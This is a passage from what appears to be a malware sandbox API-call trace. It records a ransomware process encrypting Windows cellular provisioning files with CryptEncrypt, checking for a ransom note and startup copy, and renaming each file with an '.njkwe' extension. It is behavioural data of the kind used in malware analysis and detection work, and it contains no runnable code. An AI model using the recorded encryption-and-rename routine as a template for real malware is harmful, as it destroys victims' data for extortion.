"c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\511__cellular_persimsettings_$(__iccid)_simblocklist.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.578] GetProcessHeap () returned 0xbe0000 [0081.578] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.578] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9126046c, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9126046c, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9126046c, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x283, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="512__Connections_Cellular_Ancel (Uruguay)_i0$(__MVID)@WAP.provxml", cAlternateFileName="512__C~1.PRO")) returned 1 [0081.581] lstrcmpiW (lpString1="512__Connections_Cellular_Ancel (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.581] lstrcmpiW (lpString1="512__Connections_Cellular_Ancel (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.581] lstrcmpiW (lpString1="512__Connections_Cellular_Ancel (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.581] lstrcmpiW (lpString1="512__Connections_Cellular_Ancel (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.581] lstrcmpiW (lpString1="512__Connections_Cellular_Ancel (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.581] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\512__Connections_Cellular_Ancel (Uruguay)_i0$(__MVID)@WAP.provxml") returned 159 [0081.581] StrStrIW (lpFirst="512__Connections_Cellular_Ancel (Uruguay)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.581] lstrcmpW (lpString1="512__Connections_Cellular_Ancel (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.581] lstrcmpW (lpString1="512__Connections_Cellular_Ancel (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.581] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\512__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.581] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\512__Connections_Cellular_Ancel (Uruguay)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\512__connections_cellular_ancel (uruguay)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.581] GetTickCount () returned 0x1154b4e [0081.581] GetTickCount () returned 0x1154b4e [0081.581] GetTickCount () returned 0x1154b4e [0081.581] GetTickCount () returned 0x1154b4e [0081.581] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.582] GetProcessHeap () returned 0xbe0000 [0081.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.582] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x283, lpOverlapped=0x0) returned 1 [0081.583] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.583] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x283, lpOverlapped=0x0) returned 1 [0081.583] GetProcessHeap () returned 0xbe0000 [0081.583] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.583] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.583] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.584] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.584] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.584] CloseHandle (hObject=0x43c) returned 1 [0081.584] GetProcessHeap () returned 0xbe0000 [0081.584] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.584] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\512__Connections_Cellular_Ancel (Uruguay)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0081.584] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\512__Connections_Cellular_Ancel (Uruguay)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\512__connections_cellular_ancel (uruguay)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\512__Connections_Cellular_Ancel (Uruguay)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\512__connections_cellular_ancel (uruguay)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.585] GetProcessHeap () returned 0xbe0000 [0081.585] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.585] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9126046c, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9126046c, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9126046c, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2bd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="513__Connections_Cellular_Claro (Uruguay)_i0$(__MVID)@WAP.provxml", cAlternateFileName="513__C~1.PRO")) returned 1 [0081.585] lstrcmpiW (lpString1="513__Connections_Cellular_Claro (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.585] lstrcmpiW (lpString1="513__Connections_Cellular_Claro (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.585] lstrcmpiW (lpString1="513__Connections_Cellular_Claro (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.585] lstrcmpiW (lpString1="513__Connections_Cellular_Claro (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.585] lstrcmpiW (lpString1="513__Connections_Cellular_Claro (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.585] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\513__Connections_Cellular_Claro (Uruguay)_i0$(__MVID)@WAP.provxml") returned 159 [0081.585] StrStrIW (lpFirst="513__Connections_Cellular_Claro (Uruguay)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.585] lstrcmpW (lpString1="513__Connections_Cellular_Claro (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.585] lstrcmpW (lpString1="513__Connections_Cellular_Claro (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.585] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\513__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.585] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\513__Connections_Cellular_Claro (Uruguay)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\513__connections_cellular_claro (uruguay)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.585] GetTickCount () returned 0x1154b4e [0081.585] GetTickCount () returned 0x1154b4e [0081.585] GetTickCount () returned 0x1154b4e [0081.585] GetTickCount () returned 0x1154b4e [0081.586] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.586] GetProcessHeap () returned 0xbe0000 [0081.586] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.586] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2bd, lpOverlapped=0x0) returned 1 [0081.587] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd43, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.587] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2bd, lpOverlapped=0x0) returned 1 [0081.588] GetProcessHeap () returned 0xbe0000 [0081.588] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.588] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.588] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.588] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.588] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.588] CloseHandle (hObject=0x43c) returned 1 [0081.588] GetProcessHeap () returned 0xbe0000 [0081.588] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.588] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\513__Connections_Cellular_Claro (Uruguay)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0081.588] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\513__Connections_Cellular_Claro (Uruguay)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\513__connections_cellular_claro (uruguay)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\513__Connections_Cellular_Claro (Uruguay)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\513__connections_cellular_claro (uruguay)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.589] GetProcessHeap () returned 0xbe0000 [0081.589] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.589] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9126046c, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9126046c, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9126046c, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="514__Connections_Cellular_Telefonica (Uruguay)_i0$(__MVID)@WAP.provxml", cAlternateFileName="514__C~1.PRO")) returned 1 [0081.589] lstrcmpiW (lpString1="514__Connections_Cellular_Telefonica (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.589] lstrcmpiW (lpString1="514__Connections_Cellular_Telefonica (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.589] lstrcmpiW (lpString1="514__Connections_Cellular_Telefonica (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.589] lstrcmpiW (lpString1="514__Connections_Cellular_Telefonica (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.589] lstrcmpiW (lpString1="514__Connections_Cellular_Telefonica (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.589] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\514__Connections_Cellular_Telefonica (Uruguay)_i0$(__MVID)@WAP.provxml") returned 164 [0081.589] StrStrIW (lpFirst="514__Connections_Cellular_Telefonica (Uruguay)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.589] lstrcmpW (lpString1="514__Connections_Cellular_Telefonica (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.589] lstrcmpW (lpString1="514__Connections_Cellular_Telefonica (Uruguay)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.589] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\514__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.589] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\514__Connections_Cellular_Telefonica (Uruguay)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\514__connections_cellular_telefonica (uruguay)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.590] GetTickCount () returned 0x1154b4e [0081.590] GetTickCount () returned 0x1154b4e [0081.590] GetTickCount () returned 0x1154b4e [0081.590] GetTickCount () returned 0x1154b4e [0081.590] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.590] GetProcessHeap () returned 0xbe0000 [0081.590] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.590] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2d7, lpOverlapped=0x0) returned 1 [0081.591] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.591] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2d7, lpOverlapped=0x0) returned 1 [0081.592] GetProcessHeap () returned 0xbe0000 [0081.592] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.592] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.592] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.592] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.592] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.592] CloseHandle (hObject=0x43c) returned 1 [0081.592] GetProcessHeap () returned 0xbe0000 [0081.592] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.592] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\514__Connections_Cellular_Telefonica (Uruguay)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0081.592] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\514__Connections_Cellular_Telefonica (Uruguay)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\514__connections_cellular_telefonica (uruguay)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\514__Connections_Cellular_Telefonica (Uruguay)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\514__connections_cellular_telefonica (uruguay)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.593] GetProcessHeap () returned 0xbe0000 [0081.593] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.593] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9126046c, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9126046c, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9126046c, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="515__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="515__C~1.PRO")) returned 1 [0081.593] lstrcmpiW (lpString1="515__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0081.593] lstrcmpiW (lpString1="515__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0081.593] lstrcmpiW (lpString1="515__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0081.593] lstrcmpiW (lpString1="515__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0081.593] lstrcmpiW (lpString1="515__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0081.593] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\515__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0081.593] StrStrIW (lpFirst="515__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0081.593] lstrcmpW (lpString1="515__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.593] lstrcmpW (lpString1="515__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0081.593] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\515__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.593] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\515__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\515__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.594] GetTickCount () returned 0x1154b4e [0081.594] GetTickCount () returned 0x1154b4e [0081.594] GetTickCount () returned 0x1154b4e [0081.594] GetTickCount () returned 0x1154b4e [0081.594] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.594] GetProcessHeap () returned 0xbe0000 [0081.594] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.594] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x1d7, lpOverlapped=0x0) returned 1 [0081.595] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.595] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x1d7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x1d7, lpOverlapped=0x0) returned 1 [0081.595] GetProcessHeap () returned 0xbe0000 [0081.595] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.595] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.595] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.596] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.596] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.596] CloseHandle (hObject=0x43c) returned 1 [0081.597] GetProcessHeap () returned 0xbe0000 [0081.597] RtlAllocateHeap (HeapHandle=0xbe0000, 